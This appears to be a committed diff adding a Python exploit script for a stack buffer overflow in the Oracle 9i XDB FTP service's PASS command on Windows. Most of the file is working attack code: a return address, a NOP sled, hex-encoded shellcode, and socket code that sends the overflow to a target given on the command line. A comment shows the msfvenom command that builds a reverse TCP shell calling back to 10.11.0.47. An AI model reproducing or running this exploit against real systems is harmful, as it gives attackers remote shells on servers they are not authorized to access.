|
| 1 | +#!/usr/bin/python |
| 2 | +## oracle_9i_xdb_ftp.py |
| 3 | +## |
| 4 | +## Name: Oracle 9i XDB FTP PASS Overflow (win32)', |
| 5 | +## Description: By passing an overly long string to the PASScommand, a |
| 6 | +## stack based buffer overflow occurs. David Litchfield, has |
| 7 | +## illustrated multiple vulnerabilities inthe Oracle 9i XML |
| 8 | +## Database (XDB), during a seminar on "Variations inexploit |
| 9 | +## methods between Linux andWindows" presented at the Blackhat |
| 10 | +## conference. |
| 11 | +## |
| 12 | +## Author: charles.holtzkampf [at] gmail.com |
| 13 | +## WWW:www.bommachine.co.uk |
| 14 | +## Usage: python oracle_9i_xdb_ftp.py <IP Address> <Port> |
| 15 | + |
| 16 | +import sys, socket |
| 17 | + |
| 18 | + |
| 19 | +rhost = sys.argv[1] ## Target IP address as command line argument |
| 20 | +rport = int(sys.argv[2]) ## Target Port as command line argument |
| 21 | + |
| 22 | + |
| 23 | + |
| 24 | + |
| 25 | +ret = "\x46\x6d\x61\x60" ## oraclient9.dll (pop/pop/ret) |
| 26 | +prepend = "\x81\xc4\xff\xef\xff\xff\x44" ## following the NOP sled, but before the decoder machine code |
| 27 | + |
| 28 | + |
| 29 | + |
| 30 | + |
| 31 | +## Max space for shell code = 800 |
| 32 | +## Bad characters according to metasploit: \x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40 |
| 33 | +## Generate payload: msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.47 LPORT=4443 EXITFUNC=thread -a x86 --platform Windows -b \x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40 -f python -v shellcode |
| 34 | +## Payloads size = 348 |
| 35 | + |
| 36 | +shellcode = "" |
| 37 | +shellcode += "\x33\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e" |
| 38 | +shellcode += "\x81\x76\x0e\x94\x8c\x91\xbd\x83\xee\xfc\xe2\xf4" |
| 39 | +shellcode += "\x68\x64\x13\xbd\x94\x8c\xf1\x34\x71\xbd\x51\xd9" |
| 40 | +shellcode += "\x1f\xdc\xa1\x36\xc6\x80\x1a\xef\x80\x07\xe3\x95" |
| 41 | +shellcode += "\x9b\x3b\xdb\x9b\xa5\x73\x3d\x81\xf5\xf0\x93\x91" |
| 42 | +shellcode += "\xb4\x4d\x5e\xb0\x95\x4b\x73\x4f\xc6\xdb\x1a\xef" |
| 43 | +shellcode += "\x84\x07\xdb\x81\x1f\xc0\x80\xc5\x77\xc4\x90\x6c" |
| 44 | +shellcode += "\xc5\x07\xc8\x9d\x95\x5f\x1a\xf4\x8c\x6f\xab\xf4" |
| 45 | +shellcode += "\x1f\xb8\x1a\xbc\x42\xbd\x6e\x11\x55\x43\x9c\xbc" |
| 46 | +shellcode += "\x53\xb4\x71\xc8\x62\x8f\xec\x45\xaf\xf1\xb5\xc8" |
| 47 | +shellcode += "\x70\xd4\x1a\xe5\xb0\x8d\x42\xdb\x1f\x80\xda\x36" |
| 48 | +shellcode += "\xcc\x90\x90\x6e\x1f\x88\x1a\xbc\x44\x05\xd5\x99" |
| 49 | +shellcode += "\xb0\xd7\xca\xdc\xcd\xd6\xc0\x42\x74\xd3\xce\xe7" |
| 50 | +shellcode += "\x1f\x9e\x7a\x30\xc9\xe4\xa2\x8f\x94\x8c\xf9\xca" |
| 51 | +shellcode += "\xe7\xbe\xce\xe9\xfc\xc0\xe6\x9b\x93\x73\x44\x05" |
| 52 | +shellcode += "\x04\x8d\x91\xbd\xbd\x48\xc5\xed\xfc\xa5\x11\xd6" |
| 53 | +shellcode += "\x94\x73\x44\xed\xc4\xdc\xc1\xfd\xc4\xcc\xc1\xd5" |
| 54 | +shellcode += "\x7e\x83\x4e\x5d\x6b\x59\x06\xd7\x91\xe4\x9b\xb6" |
| 55 | +shellcode += "\x94\xa3\xf9\xbf\x94\x9d\xca\x34\x72\xe6\x81\xeb" |
| 56 | +shellcode += "\xc3\xe4\x08\x18\xe0\xed\x6e\x68\x11\x4c\xe5\xb1" |
| 57 | +shellcode += "\x6b\xc2\x99\xc8\x78\xe4\x61\x08\x36\xda\x6e\x68" |
| 58 | +shellcode += "\xfc\xef\xfc\xd9\x94\x05\x72\xea\xc3\xdb\xa0\x4b" |
| 59 | +shellcode += "\xfe\x9e\xc8\xeb\x76\x71\xf7\x7a\xd0\xa8\xad\xbc" |
| 60 | +shellcode += "\x95\x01\xd5\x99\x84\x4a\x91\xf9\xc0\xdc\xc7\xeb" |
| 61 | +shellcode += "\xc2\xca\xc7\xf3\xc2\xda\xc2\xeb\xfc\xf5\x5d\x82" |
| 62 | +shellcode += "\x12\x73\x44\x34\x74\xc2\xc7\xfb\x6b\xbc\xf9\xb5" |
| 63 | +shellcode += "\x13\x91\xf1\x42\x41\x37\x71\xa0\xbe\x86\xf9\x1b" |
| 64 | +shellcode += "\x01\x31\x0c\x42\x41\xb0\x97\xc1\x9e\x0c\x6a\x5d" |
| 65 | +shellcode += "\xe1\x89\x2a\xfa\x87\xfe\xfe\xd7\x94\xdf\x6e\x68" |
| 66 | + |
| 67 | + |
| 68 | +user = "A" * 10 ## Creating random text for user |
| 69 | +passwd = "B" * 442 ## Creating random text for password |
| 70 | +jmp_short = "\xEB\x06" ## Short jump (\xEB) to an offset of 6 (\x06) according to metasploit (Rex::Arch::X86.jmp_short(6)) |
| 71 | +two_nops = "\x90\x90" ## Two NOP's as per metasploit |
| 72 | +nops = "\x90" *(800-len(shellcode)) ## Create NOP sled to bring NOPs to 800 bytes |
| 73 | + |
| 74 | +## Building the exploit |
| 75 | + |
| 76 | +exploit = passwd + jmp_short + two_nops + ret + nops + prepend + shellcode |
| 77 | + |
| 78 | + |
| 79 | +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
| 80 | + |
| 81 | +try: |
| 82 | + print "\nConnecting..." |
| 83 | + s.connect((rhost,rport)) |
| 84 | + data = s.recv(1024) |
| 85 | + s.send('USER' + user +'\r\n') |
| 86 | + data = s.recv(1024) |
| 87 | + s.send('PASS ' + exploit + '\r\n') |
| 88 | + print "\nDone!" |
| 89 | + s.close |
| 90 | +except: |
| 91 | + print "Could not connect to " + rhost + ":" + str(rport) + "!" |
| 92 | + |
| 93 | + |
0 commit comments